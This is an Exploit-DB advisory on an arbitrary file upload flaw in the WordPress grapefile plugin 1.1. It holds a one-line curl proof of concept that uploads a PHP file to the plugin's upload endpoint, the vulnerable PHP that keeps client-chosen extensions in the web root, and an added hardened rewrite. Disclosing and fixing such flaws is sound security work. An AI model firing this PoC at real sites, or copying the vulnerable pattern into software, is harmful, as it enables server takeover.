WordPress Plugin grapefile 1.1 – Arbitrary File Upload

  • Author: Hrvoje Spoljar
    Date: 2011-08-31
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17760/
  • Title: WordPress grapefile plugin <= 1.1 Arbitrary file upload
    Date: 30-8-2011
    Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
    Version: 1.1
    Software link: http://wordpress.org/extend/plugins/grapefile/
    
    PoC:
    curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php
    
    File(s): grapeupload.php grapeupload2.php grapeupload3.php grapeupload4.php
    Vulnerable code:
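    // Destination directory sits inside the web root, under the plugin folder.
    $uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
    // basename() strips directory components only; the client-chosen
    // extension (e.g. .php) is kept unchanged.
    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
    
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        echo "success";
    }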
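
For contrast with the vulnerable code quoted above, a hardened upload routine is sketched below as an added example; it is not code from the advisory or from the plugin. It replaces the client-supplied file name with a server-generated one and accepts a file only when both its extension and its detected content type are on an allowlist. The names `ALLOWED`, `MAX_BYTES` and `store_upload()`, the AVI MIME list, the size limit and the destination path are assumptions chosen for illustration.

```php
<?php
// Added example: hardened counterpart to the quoted upload handler.
// ALLOWED, MAX_BYTES, store_upload() and the paths are hypothetical.

const ALLOWED = [               // extension => MIME types accepted for it
    'avi' => ['video/x-msvideo', 'video/avi', 'video/vnd.avi'],
];
const MAX_BYTES = 50 * 1024 * 1024;   // assumed size limit

function store_upload(array $file, string $destDir): string
{
    // Reject failed uploads and paths that PHP did not create for this request.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Allowlist on the final extension of the client-supplied name.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Inspect the bytes on disk, not the Content-Type the client sent.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: nothing from the request reaches the path.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $target;
}

// Usage inside a handler that has already authenticated and authorised
// the caller; the destination is a placeholder outside the web root.
// $path = store_upload($_FILES['userfile'], '/var/lib/example-app/uploads/avi');
```

Keeping the destination outside the document root, or configuring the web server so that the upload directory never executes scripts, limits the impact if a check is later bypassed.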